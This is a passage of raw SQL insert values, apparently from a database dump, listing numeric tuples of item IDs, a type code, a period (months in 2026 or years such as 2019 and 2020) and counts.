2),(5317,2,'202604',32),(5359,2,'202604',32),(479,2,'202604',33),(481,2,'202604',33),(2809,2,'202604',33),(3069,2,'202604',33),(3096,2,'202604',33),(3735,2,'202604',33),(4400,2,'202604',33),(4712,2,'202604',33),(5050,2,'202604',33),(102,2,'202604',34),(483,2,'202604',34),(1590,2,'202604',34),(1703,2,'202604',34),(1713,2,'202604',34),(1730,2,'202604',34),(2956,2,'202604',34),(3777,2,'202604',34),(4529,2,'202604',34),(4694,2,'202604',34),(4878,2,'202604',34),(5636,2,'202604',34),(478,2,'202604',35),(2558,2,'202604',35),(3313,2,'202604',35),(4457,2,'202604',35),(4587,2,'202604',35),(4703,2,'202604',35),(4802,2,'202604',35),(5062,2,'202604',35),(5101,2,'202604',35),(5146,2,'202604',35),(5248,2,'202604',35),(5356,2,'202604',35),(5378,2,'202604',35),(5585,2,'202604',35),(486,2,'202604',36),(1699,2,'202604',36),(2801,2,'202604',36),(2989,2,'202604',36),(3034,2,'202604',36),(3479,2,'202604',36),(3724,2,'202604',36),(4368,2,'202604',36),(4566,2,'202604',36),(5268,2,'202604',36),(5271,2,'202604',36),(5409,2,'202604',36),(5472,2,'202604',36),(5515,2,'202604',36),(1596,2,'202604',37),(2148,2,'202604',37),(2658,2,'202604',37),(3090,2,'202604',37),(3253,2,'202604',37),(4753,2,'202604',37),(4759,2,'202604',37),(5054,2,'202604',37),(5153,2,'202604',37),(5310,2,'202604',37),(1774,2,'202604',38),(3124,2,'202604',38),(3738,2,'202604',38),(4750,2,'202604',38),(4874,2,'202604',38),(5276,2,'202604',38),(5567,2,'202604',38),(5578,2,'202604',38),(5683,2,'202604',38),(488,2,'202604',39),(1600,2,'202604',39),(2297,2,'202604',39),(3041,2,'202604',39),(4326,2,'202604',39),(4608,2,'202604',39),(4651,2,'202604',39),(4660,2,'202604',39),(4685,2,'202604',39),(3117,2,'202604',40),(3534,2,'202604',40),(5131,2,'202604',40),(5314,2,'202604',40),(1606,2,'202604',41),(1612,2,'202604',41),(1722,2,'202604',41),(3006,2,'202604',41),(3290,2,'202604',41),(3307,2,'202604',41),(3438,2,'202604',41),(4448,2,'202604',41),(4697,2,'202604',41),(1610,2,'202604',42),(3030,2,'202604',42),(4700,2,'202604',42),(4980,2,'202604',42),(5033,2,'202604',42),(5326,2,'202604',42),(5582,2,'202604',42),(1592,2,'202604',43),(1770,2,'202604',43),(2775,2,'202604',43),(3710,2,'202604',43),(4301,2,'202604',43),(4396,2,'202604',43),(5253,2,'202604',43),(5298,2,'202604',43),(5330,2,'202604',43),(4238,2,'202604',44),(4551,2,'202604',44),(5304,2,'202604',44),(5353,2,'202604',44),(5464,2,'202604',44),(5512,2,'202604',44),(2309,2,'202604',45),(3764,2,'202604',45),(5449,2,'202604',45),(5561,2,'202604',45),(5662,2,'202604',45),(3749,2,'202604',46),(4776,2,'202604',46),(1594,2,'202604',47),(3023,2,'202604',47),(472,2,'202604',48),(1584,2,'202604',48),(1724,2,'202604',48),(485,2,'202604',49),(4645,2,'202604',49),(5067,2,'202604',49),(5157,2,'202604',49),(5280,2,'202604',49),(5878,2,'202604',49),(570,2,'202604',50),(1747,2,'202604',50),(3083,2,'202604',50),(5080,2,'202604',50),(476,2,'202604',51),(3004,2,'202604',51),(4524,2,'202604',51),(4612,2,'202604',51),(5461,2,'202604',51),(5609,2,'202604',51),(5674,2,'202604',51),(5307,2,'202604',52),(5457,2,'202604',52),(5601,2,'202604',52),(1778,2,'202604',53),(4436,2,'202604',53),(5605,2,'202604',53),(5666,2,'202604',53),(5875,2,'202604',53),(5374,2,'202604',54),(5570,2,'202604',54),(471,2,'202604',55),(1718,2,'202604',55),(4722,2,'202604',55),(1598,2,'202604',56),(1604,2,'202604',56),(1780,2,'202604',56),(2769,2,'202604',56),(5363,2,'202604',56),(2159,2,'202604',57),(1608,2,'202604',58),(5868,2,'202604',58),(3102,2,'202604',59),(5771,2,'202604',59),(2813,2,'202604',60),(5259,2,'202604',60),(5428,2,'202604',60),(5696,2,'202604',60),(5071,2,'202604',61),(5828,2,'202604',61),(5598,2,'202604',62),(3297,2,'202604',63),(5415,2,'202604',63),(1614,2,'202604',65),(5735,2,'202604',65),(5163,2,'202604',66),(5626,2,'202604',66),(1586,2,'202604',67),(3251,2,'202604',67),(4420,2,'202604',67),(5441,2,'202604',67),(5865,2,'202604',67),(467,2,'202604',68),(4335,2,'202604',68),(5700,2,'202604',69),(2704,2,'202604',71),(469,2,'202604',72),(5833,2,'202604',72),(1728,2,'202604',74),(5400,2,'202604',74),(5492,2,'202604',74),(5872,2,'202604',74),(5778,2,'202604',75),(5821,2,'202604',76),(5738,2,'202604',77),(1544,2,'202604',79),(5824,2,'202604',80),(487,2,'202604',81),(1588,2,'202604',83),(5454,2,'202604',83),(5816,2,'202604',83),(5785,2,'202604',84),(473,2,'202604',85),(5489,2,'202604',85),(5762,2,'202604',85),(4556,2,'202604',86),(4520,2,'202604',87),(2804,2,'202604',88),(5436,2,'202604',88),(1602,2,'202604',89),(5433,2,'202604',89),(5420,2,'202604',91),(5076,2,'202604',93),(5502,2,'202604',101),(468,2,'202604',112),(5406,2,'202604',118),(5593,2,'202604',118),(5769,2,'202604',128),(74,2,'202604',129),(470,2,'202604',133),(5844,2,'202604',137),(1582,2,'202604',139),(474,2,'202604',142),(2503,2,'202604',144),(335,2,'202604',145),(2904,2,'202604',147),(5847,2,'202604',151),(87,2,'202604',156),(4930,2,'202604',157),(5397,2,'202604',160),(5859,2,'202604',179),(108,2,'202604',183),(3781,2,'202604',219),(91,2,'202604',223),(84,2,'202604',231),(76,2,'202604',235),(3087,2,'202604',253),(68,2,'202604',281),(72,2,'202604',486),(3060,2,'202604',784),(80,2,'202604',792),(89,2,'202604',964),(3541,2,'202604',1014),(1741,2,'202604',1027),(9,2,'202604',20550),(5917,2,'202605',13),(5921,2,'202605',13),(5930,2,'202605',19),(4883,2,'202605',21),(3109,2,'202605',22),(3257,2,'202605',22),(5925,2,'202605',22),(1699,2,'202605',23),(1709,2,'202605',24),(3261,2,'202605',24),(4888,2,'202605',24),(110,2,'202605',25),(1745,2,'202605',25),(2063,2,'202605',25),(2165,2,'202605',25),(2178,2,'202605',25),(2293,2,'202605',25),(4382,2,'202605',25),(5042,2,'202605',25),(482,2,'202605',26),(1713,2,'202605',26),(1730,2,'202605',26),(1749,2,'202605',26),(3247,2,'202605',26),(3280,2,'202605',26),(4428,2,'202605',26),(4706,2,'202605',26),(5046,2,'202605',26),(1697,2,'202605',27),(3104,2,'202605',27),(3263,2,'202605',27),(3287,2,'202605',27),(4546,2,'202605',27),(4648,2,'202605',27),(4681,2,'202605',27),(4858,2,'202605',27),(4862,2,'202605',27),(1720,2,'202605',28),(1734,2,'202605',28),(4674,2,'202605',28),(1737,2,'202605',29),(1772,2,'202605',29),(2156,2,'202605',29),(3226,2,'202605',29),(3746,2,'202605',29),(3771,2,'202605',29),(5330,2,'202605',29),(478,2,'202605',30),(1695,2,'202605',30),(1701,2,'202605',30),(1776,2,'202605',30),(2154,2,'202605',30),(2252,2,'202605',30),(2296,2,'202605',30),(3245,2,'202605',30),(3285,2,'202605',30),(3316,2,'202605',30),(3534,2,'202605',30),(3714,2,'202605',30),(4323,2,'202605',30),(4357,2,'202605',30),(4432,2,'202605',30),(4440,2,'202605',30),(4688,2,'202605',30),(4996,2,'202605',30),(481,2,'202605',31),(1739,2,'202605',31),(2150,2,'202605',31),(2609,2,'202605',31),(3275,2,'202605',31),(3313,2,'202605',31),(4591,2,'202605',31),(4691,2,'202605',31),(4802,2,'202605',31),(5289,2,'202605',31),(5295,2,'202605',31),(1726,2,'202605',32),(1732,2,'202605',32),(2152,2,'202605',32),(3072,2,'202605',32),(3092,2,'202605',32),(4373,2,'202605',32),(4391,2,'202605',32),(4893,2,'202605',32),(4988,2,'202605',32),(5125,2,'202605',32),(1711,2,'202605',33),(1751,2,'202605',33),(2248,2,'202605',33),(3066,2,'202605',33),(3079,2,'202605',33),(3229,2,'202605',33),(3531,2,'202605',33),(4329,2,'202605',33),(4338,2,'202605',33),(4657,2,'202605',33),(4694,2,'202605',33),(4712,2,'202605',33),(4744,2,'202605',33),(4870,2,'202605',33),(5153,2,'202605',33),(5582,2,'202605',33),(484,2,'202605',34),(1715,2,'202605',34),(2161,2,'202605',34),(2964,2,'202605',34),(3096,2,'202605',34),(3282,2,'202605',34),(4416,2,'202605',34),(4457,2,'202605',34),(4703,2,'202605',34),(5037,2,'202605',34),(5140,2,'202605',34),(5253,2,'202605',34),(5425,2,'202605',34),(486,2,'202605',35),(1768,2,'202605',35),(3034,2,'202605',35),(3735,2,'202605',35),(4341,2,'202605',35),(4363,2,'202605',35),(4976,2,'202605',35),(4980,2,'202605',35),(5028,2,'202605',35),(5280,2,'202605',35),(479,2,'202605',36),(480,2,'202605',36),(2991,2,'202605',36),(3063,2,'202605',36),(3069,2,'202605',36),(3107,2,'202605',36),(3259,2,'202605',36),(3267,2,'202605',36),(3269,2,'202605',36),(3278,2,'202605',36),(3486,2,'202605',36),(3742,2,'202605',36),(4404,2,'202605',36),(4408,2,'202605',36),(4412,2,'202605',36),(4514,2,'202605',36),(4517,2,'202605',36),(4654,2,'202605',36),(4663,2,'202605',36),(4668,2,'202605',36),(4756,2,'202605',36),(5020,2,'202605',36),(5024,2,'202605',36),(2801,2,'202605',37),(2993,2,'202605',37),(3027,2,'202605',37),(3243,2,'202605',37),(3249,2,'202605',37),(3265,2,'202605',37),(3498,2,'202605',37),(4275,2,'202605',37),(4454,2,'202605',37),(4551,2,'202605',37),(4697,2,'202605',37),(4741,2,'202605',37),(4768,2,'202605',37),(4792,2,'202605',37),(5134,2,'202605',37),(5248,2,'202605',37),(5317,2,'202605',37),(5320,2,'202605',37),(5383,2,'202605',37),(5609,2,'202605',37),(5666,2,'202605',37),(488,2,'202605',38),(1707,2,'202605',38),(1766,2,'202605',38),(2751,2,'202605',38),(3117,2,'202605',38),(3271,2,'202605',38),(3482,2,'202605',38),(3724,2,'202605',38),(3738,2,'202605',38),(4444,2,'202605',38),(4797,2,'202605',38),(4874,2,'202605',38),(4983,2,'202605',38),(5058,2,'202605',38),(5415,2,'202605',38),(5472,2,'202605',38),(1782,2,'202605',39),(3127,2,'202605',39),(3721,2,'202605',39),(4424,2,'202605',39),(4566,2,'202605',39),(4709,2,'202605',39),(4897,2,'202605',39),(5050,2,'202605',39),(5122,2,'202605',39),(5374,2,'202605',39),(1703,2,'202605',40),(3038,2,'202605',40),(3090,2,'202605',40),(3124,2,'202605',40),(4387,2,'202605',40),(5067,2,'202605',40),(5314,2,'202605',40),(5323,2,'202605',40),(5461,2,'202605',40),(5585,2,'202605',40),(5889,2,'202605',40),(467,2,'202605',41),(485,2,'202605',41),(1774,2,'202605',41),(2148,2,'202605',41),(2809,2,'202605',41),(2965,2,'202605',41),(3097,2,'202605',41),(3727,2,'202605',41),(4377,2,'202605',41),(4685,2,'202605',41),(4771,2,'202605',41),(5062,2,'202605',41),(5636,2,'202605',41),(3240,2,'202605',42),(3290,2,'202605',42),(3479,2,'202605',42),(3710,2,'202605',42),(4326,2,'202605',42),(4582,2,'202605',42),(4765,2,'202605',42),(5101,2,'202605',42),(5146,2,'202605',42),(5271,2,'202605',42),(5292,2,'202605',42),(5304,2,'202605',42),(483,2,'202605',43),(2617,2,'202605',43),(3005,2,'202605',43),(3023,2,'202605',43),(3489,2,'202605',43),(3777,2,'202605',43),(4396,2,'202605',43),(4750,2,'202605',43),(4878,2,'202605',43),(5256,2,'202605',43),(5561,2,'202605',43),(106,2,'202605',44),(1590,2,'202605',44),(2748,2,'202605',44),(3438,2,'202605',44),(4332,2,'202605',44),(4436,2,'202605',44),(4700,2,'202605',44),(4753,2,'202605',44),(4866,2,'202605',44),(5137,2,'202605',44),(5467,2,'202605',44),(5492,2,'202605',44),(477,2,'202605',45),(1770,2,'202605',45),(3041,2,'202605',45),(3430,2,'202605',45),(3541,2,'202605',45),(3731,2,'202605',45),(4400,2,'202605',45),(4587,2,'202605',45),(4722,2,'202605',45),(5128,2,'202605',45),(5131,2,'202605',45),(5298,2,'202605',45),(5334,2,'202605',45),(5601,2,'202605',45),(469,2,'202605',46),(1705,2,'202605',46),(2989,2,'202605',46),(3045,2,'202605',46),(3774,2,'202605',46),(4542,2,'202605',46),(4762,2,'202605',46),(5054,2,'202605',46),(5378,2,'202605',46),(5412,2,'202605',46),(5512,2,'202605',46),(2911,2,'202605',47),(3273,2,'202605',47),(3752,2,'202605',47),(4608,2,'202605',47),(5515,2,'202605',47),(5683,2,'202605',47),(1722,2,'202605',48),(2309,2,'202605',48),(4645,2,'202605',48),(4660,2,'202605',48),(4747,2,'202605',48),(5356,2,'202605',48),(1598,2,'202605',49),(1741,2,'202605',49),(2956,2,'202605',49),(3006,2,'202605',49),(3307,2,'202605',49),(4524,2,'202605',49),(4651,2,'202605',49),(5457,2,'202605',49),(5464,2,'202605',49),(102,2,'202605',50),(2297,2,'202605',50),(4301,2,'202605',50),(4529,2,'202605',50),(4677,2,'202605',50),(5578,2,'202605',50),(5598,2,'202605',50),(1592,2,'202605',51),(1743,2,'202605',51),(2775,2,'202605',51),(5080,2,'202605',51),(5449,2,'202605',51),(5454,2,'202605',51),(471,2,'202605',52),(1596,2,'202605',52),(1610,2,'202605',52),(2159,2,'202605',52),(2769,2,'202605',52),(3030,2,'202605',52),(3253,2,'202605',52),(3297,2,'202605',52),(4368,2,'202605',52),(4977,2,'202605',52),(5033,2,'202605',52),(1594,2,'202605',53),(3749,2,'202605',53),(4448,2,'202605',53),(5163,2,'202605',53),(5264,2,'202605',53),(5567,2,'202605',53),(5570,2,'202605',53),(476,2,'202605',54),(2457,2,'202605',54),(5157,2,'202605',54),(5326,2,'202605',54),(2658,2,'202605',55),(5428,2,'202605',55),(5674,2,'202605',55),(3004,2,'202605',56),(5785,2,'202605',56),(5902,2,'202605',56),(1606,2,'202605',57),(1728,2,'202605',57),(2813,2,'202605',57),(5310,2,'202605',57),(5910,2,'202605',57),(4776,2,'202605',58),(5359,2,'202605',58),(5441,2,'202605',58),(5833,2,'202605',58),(472,2,'202605',59),(1600,2,'202605',59),(5605,2,'202605',59),(570,2,'202605',60),(1780,2,'202605',60),(5276,2,'202605',60),(5353,2,'202605',60),(5363,2,'202605',60),(2804,2,'202605',61),(4556,2,'202605',61),(4759,2,'202605',61),(5301,2,'202605',61),(5771,2,'202605',61),(1544,2,'202605',62),(1588,2,'202605',62),(1604,2,'202605',63),(1612,2,'202605',63),(4612,2,'202605',63),(5409,2,'202605',64),(5816,2,'202605',64),(5307,2,'202605',65),(5662,2,'202605',65),(4335,2,'202605',66),(5400,2,'202605',66),(5844,2,'202605',66),(4420,2,'202605',67),(1584,2,'202605',69),(5259,2,'202605',69),(3102,2,'202605',70),(3764,2,'202605',70),(5436,2,'202605',70),(5738,2,'202605',70),(5865,2,'202605',70),(5906,2,'202605',70),(5762,2,'202605',71),(5433,2,'202605',72),(2704,2,'202605',73),(4238,2,'202605',73),(5696,2,'202605',73),(4520,2,'202605',74),(5778,2,'202605',75),(5700,2,'202605',77),(5735,2,'202605',77),(3083,2,'202605',78),(5868,2,'202605',78),(2558,2,'202605',79),(5821,2,'202605',79),(1778,2,'202605',80),(1586,2,'202605',82),(1608,2,'202605',83),(5268,2,'202605',85),(5420,2,'202605',86),(5626,2,'202605',86),(1614,2,'202605',89),(5824,2,'202605',90),(487,2,'202605',91),(5071,2,'202605',91),(473,2,'202605',98),(5847,2,'202605',99),(468,2,'202605',100),(74,2,'202605',103),(5502,2,'202605',103),(5406,2,'202605',104),(5872,2,'202605',104),(1602,2,'202605',107),(5828,2,'202605',107),(5489,2,'202605',108),(5593,2,'202605',108),(5875,2,'202605',109),(1724,2,'202605',110),(470,2,'202605',118),(5769,2,'202605',118),(5878,2,'202605',120),(4930,2,'202605',121),(5397,2,'202605',121),(3251,2,'202605',122),(5076,2,'202605',125),(1747,2,'202605',126),(3087,2,'202605',130),(108,2,'202605',134),(335,2,'202605',134),(87,2,'202605',140),(474,2,'202605',142),(2503,2,'202605',142),(5881,2,'202605',146),(5859,2,'202605',151),(1582,2,'202605',152),(3781,2,'202605',152),(1718,2,'202605',179),(2904,2,'202605',179),(76,2,'202605',220),(89,2,'202605',265),(84,2,'202605',266),(68,2,'202605',282),(5884,2,'202605',282),(3060,2,'202605',325),(91,2,'202605',337),(72,2,'202605',603),(80,2,'202605',875),(9,2,'202605',22343),(3229,2,'202606',4),(3738,2,'202606',5),(3752,2,'202606',5),(4691,2,'202606',5),(4797,2,'202606',5),(5248,2,'202606',5),(3482,2,'202606',6),(4332,2,'202606',6),(4514,2,'202606',6),(4587,2,'202606',6),(1745,2,'202606',7),(2248,2,'202606',7),(3257,2,'202606',7),(3771,2,'202606',7),(4428,2,'202606',7),(4517,2,'202606',7),(4759,2,'202606',7),(4897,2,'202606',7),(4976,2,'202606',7),(5024,2,'202606',7),(106,2,'202606',8),(479,2,'202606',8),(2154,2,'202606',8),(2293,2,'202606',8),(3245,2,'202606',8),(3261,2,'202606',8),(3269,2,'202606',8),(3489,2,'202606',8),(3721,2,'202606',8),(4323,2,'202606',8),(4329,2,'202606',8),(4387,2,'202606',8),(4657,2,'202606',8),(4663,2,'202606',8),(4858,2,'202606',8),(5472,2,'202606',8),(1737,2,'202606',9),(1749,2,'202606',9),(1751,2,'202606',9),(1774,2,'202606',9),(2296,2,'202606',9),(2748,2,'202606',9),(2809,2,'202606',9),(3092,2,'202606',9),(3265,2,'202606',9),(3273,2,'202606',9),(3746,2,'202606',9),(4326,2,'202606',9),(4391,2,'202606',9),(4400,2,'202606',9),(4591,2,'202606',9),(4645,2,'202606',9),(4750,2,'202606',9),(4753,2,'202606',9),(4765,2,'202606',9),(4792,2,'202606',9),(5080,2,'202606',9),(5289,2,'202606',9),(5441,2,'202606',9),(5578,2,'202606',9),(5609,2,'202606',9),(5666,2,'202606',9),(1697,2,'202606',10),(1709,2,'202606',10),(1782,2,'202606',10),(2161,2,'202606',10),(2178,2,'202606',10),(2252,2,'202606',10),(2956,2,'202606',10),(3041,2,'202606',10),(3079,2,'202606',10),(3107,2,'202606',10),(3243,2,'202606',10),(3280,2,'202606',10),(3285,2,'202606',10),(3479,2,'202606',10),(3531,2,'202606',10),(3735,2,'202606',10),(3749,2,'202606',10),(3774,2,'202606',10),(4275,2,'202606',10),(4357,2,'202606',10),(4377,2,'202606',10),(4396,2,'202606',10),(4424,2,'202606',10),(4432,2,'202606',10),(4551,2,'202606',10),(4688,2,'202606',10),(4888,2,'202606',10),(4893,2,'202606',10),(5157,2,'202606',10),(5292,2,'202606',10),(5320,2,'202606',10),(5383,2,'202606',10),(477,2,'202606',11),(481,2,'202606',11),(1720,2,'202606',11),(1726,2,'202606',11),(1743,2,'202606',11),(2775,2,'202606',11),(2965,2,'202606',11),(3278,2,'202606',11),(3282,2,'202606',11),(3534,2,'202606',11),(3714,2,'202606',11),(4338,2,'202606',11),(4651,2,'202606',11),(4694,2,'202606',11),(4700,2,'202606',11),(4762,2,'202606',11),(4802,2,'202606',11),(4866,2,'202606',11),(5020,2,'202606',11),(5028,2,'202606',11),(5042,2,'202606',11),(5046,2,'202606',11),(5122,2,'202606',11),(5330,2,'202606',11),(5425,2,'202606',11),(5683,2,'202606',11),(110,2,'202606',12),(486,2,'202606',12),(1610,2,'202606',12),(1695,2,'202606',12),(1713,2,'202606',12),(1732,2,'202606',12),(2991,2,'202606',12),(3097,2,'202606',12),(3127,2,'202606',12),(3249,2,'202606',12),(3259,2,'202606',12),(3727,2,'202606',12),(4368,2,'202606',12),(4408,2,'202606',12),(4668,2,'202606',12),(4862,2,'202606',12),(4983,2,'202606',12),(5050,2,'202606',12),(5131,2,'202606',12),(5134,2,'202606',12),(5301,2,'202606',12),(5317,2,'202606',12),(5323,2,'202606',12),(478,2,'202606',13),(482,2,'202606',13),(1699,2,'202606',13),(1711,2,'202606',13),(1739,2,'202606',13),(1768,2,'202606',13),(2609,2,'202606',13),(2989,2,'202606',13),(2993,2,'202606',13),(3030,2,'202606',13),(3072,2,'202606',13),(3087,2,'202606',13),(3240,2,'202606',13),(3263,2,'202606',13),(3267,2,'202606',13),(3287,2,'202606',13),(3430,2,'202606',13),(3486,2,'202606',13),(3724,2,'202606',13),(3731,2,'202606',13),(3742,2,'202606',13),(4444,2,'202606',13),(4448,2,'202606',13),(4454,2,'202606',13),(4546,2,'202606',13),(4566,2,'202606',13),(4648,2,'202606',13),(4674,2,'202606',13),(4681,2,'202606',13),(4685,2,'202606',13),(4709,2,'202606',13),(4741,2,'202606',13),(4768,2,'202606',13),(4878,2,'202606',13),(5271,2,'202606',13),(5314,2,'202606',13),(5412,2,'202606',13),(5512,2,'202606',13),(5561,2,'202606',13),(5582,2,'202606',13),(5662,2,'202606',13),(483,2,'202606',14),(484,2,'202606',14),(1606,2,'202606',14),(1734,2,'202606',14),(2911,2,'202606',14),(3045,2,'202606',14),(3066,2,'202606',14),(3104,2,'202606',14),(3117,2,'202606',14),(3307,2,'202606',14),(3313,2,'202606',14),(3438,2,'202606',14),(4412,2,'202606',14),(4440,2,'202606',14),(4524,2,'202606',14),(4654,2,'202606',14),(4697,2,'202606',14),(4756,2,'202606',14),(4771,2,'202606',14),(4988,2,'202606',14),(5033,2,'202606',14),(5037,2,'202606',14),(5146,2,'202606',14),(5256,2,'202606',14),(5353,2,'202606',14),(5515,2,'202606',14),(1590,2,'202606',15),(1707,2,'202606',15),(1730,2,'202606',15),(1776,2,'202606',15),(2063,2,'202606',15),(2152,2,'202606',15),(2165,2,'202606',15),(2751,2,'202606',15),(2964,2,'202606',15),(3096,2,'202606',15),(3109,2,'202606',15),(3251,2,'202606',15),(3271,2,'202606',15),(3316,2,'202606',15),(3498,2,'202606',15),(3764,2,'202606',15),(4341,2,'202606',15),(4556,2,'202606',15),(4582,2,'202606',15),(4660,2,'202606',15),(4703,2,'202606',15),(4870,2,'202606',15),(4883,2,'202606',15),(4996,2,'202606',15),(5295,2,'202606',15),(5334,2,'202606',15),(5428,2,'202606',15),(471,2,'202606',16),(485,2,'202606',16),(488,2,'202606',16),(1705,2,'202606',16),(1772,2,'202606',16),(2156,2,'202606',16),(3027,2,'202606',16),(3063,2,'202606',16),(3069,2,'202606',16),(3275,2,'202606',16),(3777,2,'202606',16),(4373,2,'202606',16),(4416,2,'202606',16),(4677,2,'202606',16),(4706,2,'202606',16),(4776,2,'202606',16),(4874,2,'202606',16),(5058,2,'202606',16),(5067,2,'202606',16),(5125,2,'202606',16),(5128,2,'202606',16),(5137,2,'202606',16),(5140,2,'202606',16),(5163,2,'202606',16),(5374,2,'202606',16),(5461,2,'202606',16),(5605,2,'202606',16),(5636,2,'202606',16),(480,2,'202606',17),(1703,2,'202606',17),(1766,2,'202606',17),(2804,2,'202606',17),(3023,2,'202606',17),(4382,2,'202606',17),(4529,2,'202606',17),(5054,2,'202606',17),(5280,2,'202606',17),(5304,2,'202606',17),(5356,2,'202606',17),(5585,2,'202606',17),(1722,2,'202606',18),(1741,2,'202606',18),(1770,2,'202606',18),(2617,2,'202606',18),(3226,2,'202606',18),(3541,2,'202606',18),(4404,2,'202606',18),(4457,2,'202606',18),(4722,2,'202606',18),(5062,2,'202606',18),(5253,2,'202606',18),(5268,2,'202606',18),(5310,2,'202606',18),(5326,2,'202606',18),(5400,2,'202606',18),(5464,2,'202606',18),(5467,2,'202606',18),(5601,2,'202606',18),(1701,2,'202606',19),(1718,2,'202606',19),(2150,2,'202606',19),(2801,2,'202606',19),(3006,2,'202606',19),(3034,2,'202606',19),(3124,2,'202606',19),(4612,2,'202606',19),(4712,2,'202606',19),(4744,2,'202606',19),(4980,2,'202606',19),(5264,2,'202606',19),(5492,2,'202606',19),(5696,2,'202606',19),(5785,2,'202606',19),(102,2,'202606',20),(1592,2,'202606',20),(1724,2,'202606',20),(2457,2,'202606',20),(2558,2,'202606',20),(3038,2,'202606',20),(3090,2,'202606',20),(3290,2,'202606',20),(5101,2,'202606',20),(5449,2,'202606',20),(476,2,'202606',21),(1600,2,'202606',21),(2148,2,'202606',21),(3004,2,'202606',21),(3247,2,'202606',21),(3297,2,'202606',21),(4520,2,'202606',21),(4542,2,'202606',21),(5307,2,'202606',21),(5598,2,'202606',21),(5735,2,'202606',21),(5889,2,'202606',21),(469,2,'202606',22),(2159,2,'202606',22),(3253,2,'202606',22),(4363,2,'202606',22),(5359,2,'202606',22),(5363,2,'202606',22),(5433,2,'202606',22),(5570,2,'202606',22),(5674,2,'202606',22),(5816,2,'202606',22),(5844,2,'202606',22),(467,2,'202606',23),(1604,2,'202606',23),(1780,2,'202606',23),(2297,2,'202606',23),(2309,2,'202606',23),(4238,2,'202606',23),(4608,2,'202606',23),(5276,2,'202606',23),(5298,2,'202606',23),(5626,2,'202606',23),(5821,2,'202606',23),(5833,2,'202606',23),(5865,2,'202606',23),(4301,2,'202606',24),(5420,2,'202606',24),(5828,2,'202606',24),(5868,2,'202606',24),(5875,2,'202606',24),(1598,2,'202606',25),(1612,2,'202606',25),(3005,2,'202606',25),(4436,2,'202606',25),(4977,2,'202606',25),(5071,2,'202606',25),(5153,2,'202606',25),(5415,2,'202606',25),(3083,2,'202606',26),(3710,2,'202606',26),(5567,2,'202606',26),(1596,2,'202606',27),(1715,2,'202606',27),(2658,2,'202606',27),(5378,2,'202606',27),(472,2,'202606',28),(4335,2,'202606',28),(5872,2,'202606',28),(5259,2,'202606',29),(5762,2,'202606',29),(5917,2,'202606',29),(5961,2,'202606',29),(1584,2,'202606',30),(1608,2,'202606',30),(2704,2,'202606',30),(4747,2,'202606',30),(570,2,'202606',31),(1544,2,'202606',31),(1614,2,'202606',31),(1778,2,'202606',31),(4420,2,'202606',31),(5700,2,'202606',31),(5738,2,'202606',31),(5921,2,'202606',31),(5925,2,'202606',31),(3060,2,'202606',32),(5964,2,'202606',32),(2769,2,'202606',33),(5502,2,'202606',33),(1594,2,'202606',34),(2813,2,'202606',34),(473,2,'202606',35),(1588,2,'202606',35),(5884,2,'202606',35),(5975,2,'202606',35),(68,2,'202606',36),(5454,2,'202606',36),(5778,2,'202606',36),(5967,2,'202606',36),(1728,2,'202606',37),(5436,2,'202606',37),(5457,2,'202606',37),(5771,2,'202606',37),(1586,2,'202606',38),(1747,2,'202606',38),(5881,2,'202606',38),(5409,2,'202606',39),(5406,2,'202606',40),(5824,2,'202606',40),(5847,2,'202606',40),(5902,2,'202606',40),(487,2,'202606',41),(5076,2,'202606',41),(5986,2,'202606',41),(3102,2,'202606',42),(108,2,'202606',43),(5769,2,'202606',44),(4930,2,'202606',46),(5878,2,'202606',46),(470,2,'202606',49),(74,2,'202606',50),(1602,2,'202606',51),(5593,2,'202606',51),(468,2,'202606',52),(5945,2,'202606',52),(5489,2,'202606',53),(87,2,'202606',55),(5859,2,'202606',56),(5930,2,'202606',56),(1582,2,'202606',59),(335,2,'202606',61),(2503,2,'202606',61),(3781,2,'202606',61),(5906,2,'202606',61),(5910,2,'202606',61),(474,2,'202606',62),(5397,2,'202606',65),(84,2,'202606',68),(76,2,'202606',71),(5950,2,'202606',73),(89,2,'202606',86),(72,2,'202606',171),(91,2,'202606',184),(80,2,'202606',318),(2904,2,'202606',739),(9,2,'202606',9668),(480,3,'2019',1),(484,3,'2019',1),(485,3,'2019',1),(570,3,'2019',1),(1584,3,'2019',1),(1590,3,'2019',1),(1606,3,'2019',1),(1608,3,'2019',1),(1695,3,'2019',1),(1711,3,'2019',1),(1726,3,'2019',1),(1728,3,'2019',1),(1737,3,'2019',1),(1772,3,'2019',1),(1774,3,'2019',1),(1782,3,'2019',1),(2154,3,'2019',1),(2558,3,'2019',1),(2617,3,'2019',1),(467,3,'2019',2),(468,3,'2019',2),(469,3,'2019',2),(471,3,'2019',2),(478,3,'2019',2),(482,3,'2019',2),(483,3,'2019',2),(488,3,'2019',2),(1544,3,'2019',2),(1586,3,'2019',2),(1588,3,'2019',2),(1594,3,'2019',2),(1602,3,'2019',2),(1703,3,'2019',2),(1707,3,'2019',2),(1709,3,'2019',2),(1718,3,'2019',2),(1745,3,'2019',2),(1751,3,'2019',2),(1766,3,'2019',2),(1778,3,'2019',2),(1780,3,'2019',2),(2150,3,'2019',2),(2152,3,'2019',2),(2156,3,'2019',2),(2165,3,'2019',2),(2296,3,'2019',2),(2748,3,'2019',2),(470,3,'2019',3),(486,3,'2019',3),(487,3,'2019',3),(1600,3,'2019',3),(1612,3,'2019',3),(1614,3,'2019',3),(1701,3,'2019',3),(1720,3,'2019',3),(1743,3,'2019',3),(1747,3,'2019',3),(1749,3,'2019',3),(2159,3,'2019',3),(2252,3,'2019',3),(2293,3,'2019',3),(2457,3,'2019',3),(2704,3,'2019',3),(477,3,'2019',4),(1582,3,'2019',4),(1697,3,'2019',4),(1730,3,'2019',4),(2148,3,'2019',4),(1699,3,'2019',5),(1768,3,'2019',5),(1776,3,'2019',5),(2297,3,'2019',5),(2769,3,'2019',5),(2178,3,'2019',6),(2809,3,'2019',6),(2813,3,'2019',6),(474,3,'2019',7),(2248,3,'2019',7),(1713,3,'2019',8),(2775,3,'2019',8),(473,3,'2019',9),(2911,3,'2019',10),(1598,3,'2019',11),(2801,3,'2019',20),(2658,3,'2019',25),(2804,3,'2019',25),(2609,3,'2019',26),(2309,3,'2019',27),(2751,3,'2019',30),(3140,3,'2020',1),(3142,3,'2020',1),(3144,3,'2020',1),(3151,3,'2020',1),(3124,3,'2020',71),(3117,3,'2020',74),(3079,3,'2020',101),(3096,3,'2020',104),(3087,3,'2020',105),(3092,3,'2020',107),(3063,3,'2020',108),(3072,3,'2020',111),(3097,3,'2020',112),(3127,3,'2020',112),(2964,3,'2020',114),(476,3,'2020',116),(3083,3,'2020